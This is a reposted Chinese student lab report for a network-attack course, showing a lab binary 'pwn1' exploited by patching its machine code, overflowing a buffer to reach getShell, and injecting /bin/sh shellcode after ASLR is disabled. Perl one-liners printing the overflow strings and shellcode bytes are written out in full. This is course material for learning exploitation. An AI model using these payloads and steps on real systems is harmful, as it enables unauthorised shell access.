20155336虎光元 Exp1PC平台逆向破解及Bof基础实践

最新推荐文章于 2024-09-08 19:39:31 发布
最新推荐文章于 2024-09-08 19:39:31 发布
阅读量64 收藏
点赞数
原文链接:http://www.cnblogs.com/hxl681207/p/8566950.html
版权

20155336Exp1 PC平台逆向破解(5)M

实践目标:
  • 本次实践的对象是一个名为pwn1的linux可执行文件。
  • 该程序正常执行流程是:main调用foo函数,foo函数会简单回显任何用户输入的字符串。
  • 程序包含另一个代码片段,getshell,会返回一个可用shell
  • 使用两种方法进行修改文件pwn1的代码:
    • 利用foo函数的Bof漏洞构造一个攻击输入字符串,覆盖返回地址,出发getShell函数。
    • 手工修改可执行文件,改变程序执行流程,直接跳转到getShell函数。
实践一
  • 直接修改程序机器指令
    • 第一:首先确定文件pwn1是可以执行的。

    1071513-20180314093400158-417147330.png

    • 第二:2.输入objdump -d 20155336 | more进行反汇编;
    • 第三:输入vi 20155336进行编辑

    1071513-20180314093747832-185390125.jpg

      1.按ESC键
  2.输入如下,将显示模式切换为16进制模式:%!xxd
  3.查找要修改的内容/e8d7
  4.找到后前后的内容和反汇编的对比下,确认是地方是正确的
  5.修改d7为c3
  6.转换16进制为原格式:%!xxd -r
  7.存盘退出vi
  :wq
    • 第四:再次输入objdump -d 20155336 | more查看验证。
      1071513-20180314094244014-517376634.jpg
实践二
  • 利用foo函数的Bof漏洞,构造一个攻击输入字符串,覆盖返回地址,触发getShell函数。
    • 1.输入gdb pwn20155336调试该程序,输入1111111122222222333333334444444455555555字符串确定哪几个字符会覆盖到返回地址;
    1071513-20180314122110427-92944323.jpg
    • 2.再次输入字符串1111111122222222333333334444444420155233确定溢出的是那几位;

    1071513-20180314122254277-226813315.jpg

    • 3.确认用什么值来覆盖返回地址,getShell的内存地址,通过反汇编时可以看到,即0804847d,接下来要确认下字节序,简单说是输入11111111222222223333333344444444\x08\x04\x84\x7d,还是输入11111111222222223333333344444444\x7d\x84\x04\x08
    • 4.对比之前 eip 0x34333231 0x34333231 ,正确应用输入 11111111222222223333333344444444\x7d\x84\x04\x08
    • 5.构造输入字符串,由为我们没法通过键盘输入\x7d\x84\x04\x08这样的16进制值,所以先生成包括这样字符串的一个文件。\x0a表示回车,如果没有的话,在程序运行时就需要手工按一下回车键。
    • perl -e 'print "11111111222222223333333344444444\x7d\x84\x04\x08\x0a"' > input

    1071513-20180314122642226-685585647.jpg

实践三
  • 注入一个自己制作的shellcode并运行这段shellcode。
  • 步骤:
    • shellcode就是一段机器指令(code)
    • 通常这段机器指令的目的是为获取一个交互式的shell(像linux的shell或类似windows下的cmd.exe),所以这段机器指令被称为shellcode。
    • 在实际的应用中,凡是用来注入的机器指令段都通称为shellcode,像添加一个用户、运行一条指令。
      • 1.首先使用apt-get install execstack命令安装execstack;
        1071513-20180314123341731-1682460391.jpg

      • 2.修改设置:

          execstack -s pwn20155233    //设置堆栈可执行
  execstack -q pwn20155233 //查询文件的堆栈是否可执行
  more /proc/sys/kernel/randomize_va_space 
  echo "0" > /proc/sys/kernel/randomize_va_space //关闭地址随机化
  more /proc/sys/kernel/randomize_va_space

        1071513-20180314123754975-679985685.jpg

      • 3.构造要注入的payload:

      • Linux下有两种基本构造攻击buf的方法:

          retaddr+nop+shellcode
  nop+shellcode+retaddr。

        简单说缓冲区小就把shellcode放后边,缓冲区大就把shellcode放前边

结构为:nops+shellcode+retaddr。

nop一为是了填充,二是作为“着陆区/滑行区”。
我们猜的返回地址只要落在任何一个nop上,自然会滑到我们的shellcode。

perl -e 'print "\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x4\x3\x2\x1\x00"' > input_shellcode

  • 4.打开一个终端注入这段攻击buf:(cat input_shellcode;cat) | ./pwn1

    • 再开另外一个终端,用gdb来调试pwn1这个进程,调试见下图:
      1071513-20180314130254590-1206294643.png
      1071513-20180314130339031-1549540664.png

      看到 01020304了,就是返回地址的位置。shellcode就挨着,所以地址是0xffffd204;
      1071513-20180319093111294-1856052222.png

  • 5.再次输入:perl -e 'print "A" x 32;print "\x00\xd3\xff\xff\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x00\xd3\xff\xff\x00"' > input_shellcode

1071513-20180319092933217-1522782474.png

转载于:https://www.cnblogs.com/hxl681207/p/8566950.html

weixin_30706691
关注
exp1 逆向Bof基础实验报告
LIULIULOO的博客
03-12 6555
20192209楼泽培《网络对抗技术》 exp1 逆向Bof基础 文章目录1 逆向Bof基础实践说明1.1 实践目标2 直接修改程序机器指令,改变程序执行流程3 通过构造输入参数,造成BOF攻击,改变程序执行流3.1 反汇编,了解程序的基本功能3.2 确认输入字符串哪几个字符会覆盖到返回地址3.3 确认用什么值来覆盖返回地址3.4 构造输入字符串4. 注入Shellcode并执行4.1 准备一段Shellcode4.2 准备工作4.3 构造要注入的payload。重新开始4.5 结合nc模拟远程攻击5.
0x03-逆向-BoF基础基础
0pr
06-04 1082
目录 今日目标 深入 BoF BoF 的前世今生 BoF 的种类 BoF 的应对策略 物理寻址的应用 找到 Boot Sector 在内存中的前两个字节的位置 寄存器 寄存器的种类 通用寄存器 段寄存器 指针寄存器 索引寄存器 控制寄存器 段和段寄存器小结 完成任务 程序拆解及必要汇编指令 org 指令 jmp 指令 times 指令 pusha popa 指令 条件控制指令 其他必要的汇编指令 总结 参考链接 今日目标 今天细看了一下 narnia2(不知道这是什
2019-2020-2 20175227张雪莹《网络对抗技术》 Exp1 PC平台逆向破解
qq_44503603的博客
03-03 669
2019-2020-2 20175227张雪莹《网络对抗技术》 Exp1 PC平台逆向破解 目录 1. 实验内容 1.1 直接修改程序机器指令,改变程序执行流程 1.2 1.3 2. 实验要求 2.1 掌握NOP, JNE, JE, JMP, CMP汇编指令的机器码 2.2 掌握反汇编与十六进制编程器 2.3 能正确修改机器指令改变程序执行流程 2.4 能正确构造payload进行bof攻击 3...
2017-2018-2 20155314《网络对抗技术》Exp1 PC平台逆向破解(5)M
axhc_chentao1981的博客
03-17 484
2017-2018-2 20155314《网络对抗技术》Exp1 PC平台逆向破解(5)M 目录 实验要求 实验内容 预备知识 实验步骤 0 准备工作:macOS下Parallels Desktop安装Kali Linux虚拟机及相关配置 1 逆向Bof基础实践 1.1 实践目标 1.2 基础知识 2 直接修改程序机器指令,改变程序执行流程 3 通过构造输入参数,造成BOF攻...
wlgf 20221307张城玮 第一次实验 PC平台逆向破解 20221307
weixin_73548457的博客
09-08 1344
本次实验对于缓冲区溢出漏洞的利用分析有了更深入的理解,但是在汇编语言和机器语言方面的不足是一个障碍,还要加强学习,对于Linux系统的文件结构,命令基础有了更好的认识,收获很大。此外,对于gdb的使用还不够熟练,需要进一步加强。
网络对抗实验报告 | 逆向Bof基础实验报告
cyuyan3hao的博客
03-26 1277
exp1 逆向Bof基础实验报告 20192213刘子谦 1 实验要求概述 一句话,通过三种方法,在linux(kali)环境中,尝试隐藏的执行getshell函数,或者其他自定义代码段 2 实验方案 2.1 NOP, JNE, JE, JMP, CMP汇编指令的机器码 NOP:NOP指令即“空指令”。执行到NOP指令时,CPU什么也不做,仅仅当做一个指令执行过去并继续执行NOP后面的一条指令。(机器码:90),实验中我们构造滑行区就是用的这个机器命令x90。 JNE:条件转移指令,如果不相等则跳转。(
CS BOF文件编写/改写
Love&Share
01-25 1558
Beacon Object File(BOF) cs 4.1后添加的新功能,
CobaltStrike逆向学习系列(15):CS功能分析-BOF
SecSource_Stars的博客
02-22 811
这是[信安成长计划]的第 15 篇文章 0x00 目录 0x01 BOF功能分析 0x02 BOF功能执行 0x03 写在最后 其实在看过 RDI 与 DotNet 功能执行之后,BOF 的执行基本就不用再说了,唯一需要提及的可能就是它所包含的技术,而且相关的文章和代码也都很丰富了 0x01 BOF功能分析 在 CS 中,有相当一部分功能都是 BOF 形式的,我们随意选择一个 它继承了 PostExInlineObject 类,需要自己实现的并不多,但实际上,一些函数还是自己实现的好 在实际调用的时候,
YOLO系列算法精讲:从yolov1至yolov8的进阶之路(2万字超全整理)
热门推荐
不积跬步,无以至千里!
07-30 27万+
全网YOLO最详讲解,从v1到v5!从小白到大佬!
20194307肖江宇exp-1
MYRLY的博客
03-17 3163
20194307肖江《网络对抗技术》 exp1 逆向Bof基础
Exp1逆向Bof基础实践
04-18
网络对抗实验
20181313毕然《网络对抗技术》——Exp1 PC平台逆向破解
weixin_48745205的博客
03-20 264
《网络对抗技术》——Exp1 PC平台逆向破解 一、实践目标 本次实践的对象是一个名为pwn20181313的linux可执行文件。 该程序正常执行流程是:main调用foo函数,foo函数会简单回显任何用户输入的字符串。该程序同时包含另一个代码片段getShell,会返回一个可用Shell。正常情况下这段代码是不会被运行的。我们实践的目标就是想办法运行这个代码片段。 我们将学习两种方法运行这个代码片段,然后学习如何注入运行任何Shellcode。 四个实践内容如下: 手工修改可执行文件,改变程序执行流程
Ep1 逆向Bof基础实践-20202127
qq_57435798的博客
03-15 291
只要我们构造的字符串能够溢出到EIP所在位置,将其中的返回地址“80484ba”覆盖为getShell函数的地址“804847d”,则程序执行完foo函数后将返回到getShell函数去执行。查看当前所有寄存器的值,其中EIP的值为“0x30393837”,对应字符“0987”,正是我们输入的第33~36个字节的内容。终端2继续执行,看到 01020304了,就是返回地址的位置。对应机器指令为“e8。因此,可以判断输入的第33~36个字节的内容会覆盖到栈上的返回地址,进而CPU会尝试运行这个位置的代码。
基于MNIST数据集的分类器设计_MNIST_Classifier.zip
10-01
基于MNIST数据集的分类器设计_MNIST_Classifier
基于springboot项目,集成常用第三方整合的一个框架,包含通用mapper实现百分之
10-01
基于springboot项目,集成常用第三方整合的一个框架,包含通用mapper实现百分之八九十的s_myspringboot
一些经典机器学习算法的Matlab实现_MachineLearing_Matlab.zip
10-01
一些经典机器学习算法的Matlab实现_MachineLearing_Matlab
蜂鸣声音简谱播放器fmjpbfq.zip
10-01
蜂鸣声音简谱播放器fmjpbfq
电商-拼团倒计时.zip
最新发布
10-01
我们的小程序源码功能多样,涵盖社交、电商等领域。高度定制化,轻松打造专属风格。用户体验佳,界面美观操作便捷。安全可靠,保障数据与运行稳定。适合创业者、企业和开发者。提供技术支持与文档说明。快来下载,开启精彩之旅!
基于Python语言的lingkong-robot中文语音对话机器人设计源码
10-01
该项目为基于Python语言的灵活可配的lingkong-robot中文语音对话机器人设计源码,集成了C, JavaScript, HTML, Python, CSS, Shell等多种编程语言。源码总文件数达127个,涵盖文本、字节码、样式表、脚本等多种格式。项目目前已停止维护,但曾以其灵活性和可配置性著称,适用于构建智能对话系统。
"网络对抗实验:Exp1逆向Bof基础实践详解及实践目标与基础知识
逆向Bof基础实践实践目标部分,主要介绍了本次实验的学习目标,包括了解逆向工程的基本原理和应用,掌握Bof基础知识,并且通过实践加深对相关技术的理解和掌握。同时,实验目标还包括培养学习者的实践能力和...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值